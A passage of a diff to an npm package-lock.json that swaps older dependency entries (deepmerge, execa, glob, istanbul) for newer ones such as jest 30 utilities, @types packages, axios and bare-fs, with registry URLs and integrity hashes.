"sha512-Q6fKUPqnAHAyhiUgFU7BUzLiv0kd8saH9al7tnu5Q/okj6dnupxyTgFIBjVzJATdfIAm9NAsvXNzjaKa+bxVyA==", - "dev": true - }, - "deepmerge": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.0.tgz", - "integrity": "sha512-z2wJZXrmeHdvYJp/Ux55wIjqo81G5Bp4c+oELTW+7ar6SogWHajt5a9gO3s3IDaGSAXjDk0vlQKN3rms8ab3og==", - "dev": true - }, - "delayed-stream": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha1-3zrhmayt+31ECqrgsp4icrJOxhk=" - }, - "detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true - }, - "ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha1-OoOpBOVDUyh4dMVkt1SThoSamMk=", - "requires": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" - } - }, - "electron-to-chromium": { - "version": "1.3.803", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.3.803.tgz", - "integrity": "sha512-tmRK9qB8Zs8eLMtTBp+w2zVS9MUe62gQQQHjYdAc5Zljam3ZIokNb+vZLPRz9RCREp6EFRwyhOFwbt1fEriQ2Q==", - "dev": true - }, - "emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true - }, - "emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "requires": { - "is-arrayish": "^0.2.1" - } - }, - "escalade": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz", - "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==", - "dev": true - }, - "escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true - }, - "esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true - }, - "execa": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.0.0.tgz", - "integrity": "sha512-ov6w/2LCiuyO4RLYGdpFGjkcs0wMTgGE8PrkTHikeUy5iJekXyPIKUjifk5CsE0pt7sMCrMZ3YNqoCj6idQOnQ==", - "dev": true, - "requires": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - } - }, - "exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true - }, - "expect": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.4.1.tgz", - "integrity": "sha512-OKrGESHOaMxK3b6zxIq9SOW8kEXztKff/Dvg88j4xIJxur1hspEbedVkR3GpHe5LO+WB2Qw7OWN0RMTdp6as5A==", - "dev": true, - "requires": { - "@jest/expect-utils": "^29.4.1", - "jest-get-type": "^29.2.0", - "jest-matcher-utils": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1" - }, - "dependencies": { - "jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", + }, + "jest-matcher-utils": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-30.0.4.tgz", + "integrity": "sha512-ubCewJ54YzeAZ2JeHHGVoU+eDIpQFsfPQs0xURPWoNiO42LGJ+QGgfSf+hFIRplkZDkhH5MOvuxHKXRTUU3dUQ==", + "dev": true, + "requires": { + "@jest/get-type": "30.0.1", + "chalk": "^4.1.2", + "jest-diff": "30.0.4", + "pretty-format": "30.0.2" + } + }, + "jest-message-util": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-30.0.2.tgz", + "integrity": "sha512-vXywcxmr0SsKXF/bAD7t7nMamRvPuJkras00gqYeB1V0WllxZrbZ0paRr3XqpFU2sYYjD0qAaG2fRyn/CGZ0aw==", + "dev": true, + "requires": { + "@babel/code-frame": "^7.27.1", + "@jest/types": "30.0.1", + "@types/stack-utils": "^2.0.3", + "chalk": "^4.1.2", + "graceful-fs": "^4.2.11", + "micromatch": "^4.0.8", + "pretty-format": "30.0.2", + "slash": "^3.0.0", + "stack-utils": "^2.0.6" + } + }, + "jest-mock": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-30.0.2.tgz", + "integrity": "sha512-PnZOHmqup/9cT/y+pXIVbbi8ID6U1XHRmbvR7MvUy4SLqhCbwpkmXhLbsWbGewHrV5x/1bF7YDjs+x24/QSvFA==", + "dev": true, + "requires": { + "@jest/types": "30.0.1", + "@types/node": "*", + "jest-util": "30.0.2" + } + }, + "jest-util": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-30.0.2.tgz", + "integrity": "sha512-8IyqfKS4MqprBuUpZNlFB5l+WFehc8bfCe1HSZFHzft2mOuND8Cvi9r1musli+u6F3TqanCZ/Ik4H4pXUolZIg==", + "dev": true, + "requires": { + "@jest/types": "30.0.1", + "@types/node": "*", + "chalk": "^4.1.2", + "ci-info": "^4.2.0", + "graceful-fs": "^4.2.11", + "picomatch": "^4.0.2" + } + }, + "picomatch": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.2.tgz", + "integrity": "sha512-M7BAV6Rlcy5u+m6oPhAPFgJTzAioX/6B0DxyvDlo9l8+T3nLKbrczg2WLUyzd45L8RqfUMyGPzekbMvX2Ldkwg==", "dev": true - } - } - }, - "extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" - }, - "extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha1-lpGEQOMEGnpBT4xS48V06zw+HgU=" - }, - "fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" - }, - "fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" - }, - "fb-watchman": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.1.tgz", - "integrity": "sha512-DkPJKQeY6kKwmuMretBhr7G6Vodr7bFwDYTXIkfG1gjvNpaxBTQV3PbXg6bR1c1UP4jPOX0jHUbbHANL9vRjVg==", - "dev": true, - "requires": { - "bser": "2.1.1" - } - }, - "fill-range": { - "version": "7.1.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", - "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", - "dev": true, - "requires": { - "to-regex-range": "^5.0.1" - } - }, - "find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "requires": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - } - }, - "follow-redirects": { - "version": "1.15.6", - "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.15.6.tgz", - "integrity": "sha512-wWN62YITEaOpSK584EZXJafH1AGpO8RVgElfkuXbTOrPX4fIfOyEpW/CsiNd8JdYrAoOvafRTOEnvsO++qCqFA==" - }, - "forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha1-+8cfDEGt6zf5bFd60e1C2P2sypE=" - }, - "form-data": { - "version": "2.5.1", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.5.1.tgz", - "integrity": "sha512-m21N3WOmEEURgk6B9GLOE4RuWOFf28Lhh9qGYeNlGq4VDXUlJy2th2slBNU8Gp8EzloYZOibZJ7t5ecIrFSjVA==", - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - } - }, - "fs-minipass": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fs-minipass/-/fs-minipass-2.1.0.tgz", - "integrity": "sha512-V/JgOLFCS+R6Vcq0slCuaeWEdNC3ouDlJMNIsacH2VtALiu9mV4LPrHc5cDl8k5aw6J8jwgWWpiTo5RYhmIzvg==", - "requires": { - "minipass": "^3.0.0" - } - }, - "fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha1-FQStJSMVjKpA20onh8sBQRmU6k8=" - }, - "fsevents": { - "version": "2.3.2", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", - "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", - "dev": true, - "optional": true - }, - "function-bind": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.1.tgz", - "integrity": "sha512-yIovAzMX49sF8Yl58fSCWJ5svSLuaibPxXQJFLmBObTuCr0Mf1KiPopGM9NiFjiYBCbfaa2Fh6breQ6ANVTI0A==", - "dev": true - }, - "gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true + }, + "pretty-format": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-30.0.2.tgz", + "integrity": "sha512-yC5/EBSOrTtqhCKfLHqoUIAXVRZnukHPwWBJWR7h84Q3Be1DRQZLncwcfLoPA5RPQ65qfiCMqgYwdUuQ//eVpg==", + "dev": true, + "requires": { + "@jest/schemas": "30.0.1", + "ansi-styles": "^5.2.0", + "react-is": "^18.3.1" + } + } + } }, - "get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true + "@types/js-yaml": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.2.tgz", + "integrity": "sha512-KbeHS/Y4R+k+5sWXEYzAZKuB1yQlZtEghuhRxrVRLaqhtoG5+26JwQsa4HyS3AWX8v1Uwukma5HheduUDskasA==" }, - "get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", + "@types/lodash": { + "version": "4.14.172", + "resolved": "https://registry.npmjs.org/@types/lodash/-/lodash-4.14.172.tgz", + "integrity": "sha512-/BHF5HAx3em7/KkzVKm3LrsD6HZAXuXO1AJZQ3cRRBZj4oHZDviWPYu0aEplAqDFNHZPW6d3G7KN+ONcCCC7pw==", "dev": true }, - "get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", + "@types/mustache": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/@types/mustache/-/mustache-4.1.2.tgz", + "integrity": "sha512-c4OVMMcyodKQ9dpwBwh3ofK9P6U9ZktKU9S+p33UqwMNN1vlv2P0zJZUScTshnx7OEoIIRcCFNQ904sYxZz8kg==", "dev": true }, - "getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha1-Xv+OPmhNVprkyysSgmBOi6YhSfo=", + "@types/node": { + "version": "22.16.2", + "resolved": "https://registry.npmjs.org/@types/node/-/node-22.16.2.tgz", + "integrity": "sha512-Cdqa/eJTvt4fC4wmq1Mcc0CPUjp/Qy2FGqLza3z3pKymsI969TcZ54diNJv8UYUgeWxyb8FSbCkhdR6WqmUFhA==", + "dev": true, "requires": { - "assert-plus": "^1.0.0" + "undici-types": "~6.21.0" } }, - "glob": { - "version": "7.1.7", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.1.7.tgz", - "integrity": "sha512-OvD9ENzPLbegENnYP5UUfJIirTg4+XwMWGaQfQTY0JenxNvvIKP3U3/tAQSPIu/lHxXYSZmpXlUHeqAIdKzBLQ==", - "requires": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.0.4", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - } - }, - "globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true - }, - "graceful-fs": { - "version": "4.2.10", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.10.tgz", - "integrity": "sha512-9ByhssR2fPVsNZj478qUUbKfmL0+t5BDVyjShtyZZLiK7ZDAArFFfopyOTj0M05wE2tJPisA4iTnnXl2YoPvOA==", - "dev": true - }, - "har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha1-qUwiJOvKwEeCoNkDVSHyRzW37JI=" - }, - "har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", + "@types/node-fetch": { + "version": "2.6.12", + "resolved": "https://registry.npmjs.org/@types/node-fetch/-/node-fetch-2.6.12.tgz", + "integrity": "sha512-8nneRWKCg3rMtF69nLQJnOYUcbafYeFSjqkw3jCRLsqkWFlHaoQrr5mXmofFGOx3DKn7UfmBMyov8ySvLRVldA==", + "dev": true, "requires": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" + "@types/node": "*", + "form-data": "^4.0.0" } }, - "has": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", - "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", + "@types/nodemailer": { + "version": "6.4.4", + "resolved": "https://registry.npmjs.org/@types/nodemailer/-/nodemailer-6.4.4.tgz", + "integrity": "sha512-Ksw4t7iliXeYGvIQcSIgWQ5BLuC/mljIEbjf615svhZL10PE9t+ei8O9gDaD3FPCasUJn9KTLwz2JFJyiiyuqw==", "dev": true, "requires": { - "function-bind": "^1.1.1" + "@types/node": "*" } }, - "has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", + "@types/nunjucks": { + "version": "3.1.5", + "resolved": "https://registry.npmjs.org/@types/nunjucks/-/nunjucks-3.1.5.tgz", + "integrity": "sha512-0zEdmQNNvQ+xyV9kqQvAV93UVroTwhE78toVUDT0GBnGcW2jQBZnB4al9qq2LqI5qHOqROy/DvvAY/UwrbvV1A==", "dev": true }, - "html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", + "@types/stack-utils": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.3.tgz", + "integrity": "sha512-9aEbYZ3TbYMznPdcdr3SmIrLXwC/AKZXQeCf9Pgao5CKb8CyHuEX5jzWPTkvregvhRJHcpRO6BFoGW9ycaOkYw==", "dev": true }, - "http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha1-muzZJRFHcvPZW2WmCruPfBj7rOE=", + "@types/stream-buffers": { + "version": "3.0.7", + "resolved": "https://registry.npmjs.org/@types/stream-buffers/-/stream-buffers-3.0.7.tgz", + "integrity": "sha512-azOCy05sXVXrO+qklf0c/B07H/oHaIuDDAiHPVwlk3A9Ek+ksHyTeMajLZl3r76FxpPpxem//4Te61G1iW3Giw==", + "dev": true, "requires": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" + "@types/node": "*" } }, - "human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true - }, - "import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", + "@types/yargs": { + "version": "17.0.33", + "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.33.tgz", + "integrity": "sha512-WpxBCKWPLr4xSsHgz511rFJAM+wS28w2zEO1QDNY5zM/S8ok70NNfztH0xwhqKyaK0OHCbN98LDAZuy1ctxDkA==", "dev": true, "requires": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" + "@types/yargs-parser": "*" } }, - "imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha1-khi5srkoojixPcT7a21XbyMUU+o=", + "@types/yargs-parser": { + "version": "20.2.1", + "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-20.2.1.tgz", + "integrity": "sha512-7tFImggNeNBVMsn0vLrpn1H1uPrUBdnARPTpZoitY37ZrdJREzf7I16tMrlK3hen349gr1NYh8CmZQa7CTG6Aw==", "dev": true }, - "inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha1-Sb1jMdfQLQwJvJEKEHW6gWW1bfk=", - "requires": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" + "a-sync-waterfall": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/a-sync-waterfall/-/a-sync-waterfall-1.0.1.tgz", + "integrity": "sha512-RYTOHHdWipFUliRFMCS4X2Yn2X8M87V/OpSqWzKKOGhzqyUxzyVmhHDH9sAvG+ZuQf/TAOFsLCpMw09I1ufUnA==" }, - "is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", + "agent-base": { + "version": "7.1.4", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.4.tgz", + "integrity": "sha512-MnA+YT8fwfJPgBx3m60MNqakm30XOkyIoH1y6huTQvC0PwZG7ki8NacLBcrPbNoo8vEZy7Jpuk7+jMO+CUovTQ==", "dev": true }, - "is-core-module": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.5.0.tgz", - "integrity": "sha512-TXCMSDsEHMEEZ6eCA8rwRDbLu55MRGmrctljsBX/2v1d9/GzqHOxW5c5oPSgrUt2vBFXebu9rGqckXGPWOlYpg==", + "ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", "dev": true, "requires": { - "has": "^1.0.3" + "color-convert": "^2.0.1" } }, - "is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true - }, - "is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true - }, - "is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true - }, - "is-stream": { + "argparse": { "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true - }, - "is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha1-5HnICFjfDBsR3dppQPlgEfzaSpo=" + "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", + "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" }, - "isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha1-6PvzdNxVb/iUehDcsFctYz8s+hA=", - "dev": true + "asap": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/asap/-/asap-2.0.6.tgz", + "integrity": "sha1-5QNHYR1+aQlDIIu9r+vLwvuGbUY=" }, - "isomorphic-ws": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", - "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", - "requires": {} + "asynckit": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", + "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=" }, - "isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha1-R+Y/evVa+m+S4VAOaQ64uFKcCZo=" + "axios": { + "version": "1.10.0", + "resolved": "https://registry.npmjs.org/axios/-/axios-1.10.0.tgz", + "integrity": "sha512-/1xYAC4MP/HEG+3duIhFr4ZQXR4sQXOIe+o6sdqzeykGLx6Upp/1p8MHqhINOvGeP7xyNHe7tsiJByc4SSVUxw==", + "requires": { + "follow-redirects": "^1.15.6", + "form-data": "^4.0.0", + "proxy-from-env": "^1.1.0" + } }, - "istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", + "b4a": { + "version": "1.6.7", + "resolved": "https://registry.npmjs.org/b4a/-/b4a-1.6.7.tgz", + "integrity": "sha512-OnAYlL5b7LEkALw87fUVafQw5rVR9RjwGd4KUwNQ6DrrNmaVaUCgLipfVlzrPQ4tWOR9P0IXGNOx50jYCCdSJg==", "dev": true }, - "istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", + "bare-events": { + "version": "2.6.0", + "resolved": "https://registry.npmjs.org/bare-events/-/bare-events-2.6.0.tgz", + "integrity": "sha512-EKZ5BTXYExaNqi3I3f9RtEsaI/xBSGjE0XZCZilPzFAV/goswFHuPd9jEZlPIZ/iNZJwDSao9qRiScySz7MbQg==", + "dev": true, + "optional": true + }, + "bare-fs": { + "version": "4.1.6", + "resolved": "https://registry.npmjs.org/bare-fs/-/bare-fs-4.1.6.tgz", + "integrity": "sha512-25RsLF33BqooOEFNdMcEhMpJy8EoR88zSMrnOQOaM3USnOK2VmaJ1uaQEwPA6AQjrv1lXChScosN6CzbwbO9OQ==", "dev": true, + "optional": true, "requires": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" + "bare-events": "^2.5.4", + "bare-path": "^3.0.0", + "bare-stream": "^2.6.4" } }, - "istanbul-lib-report": 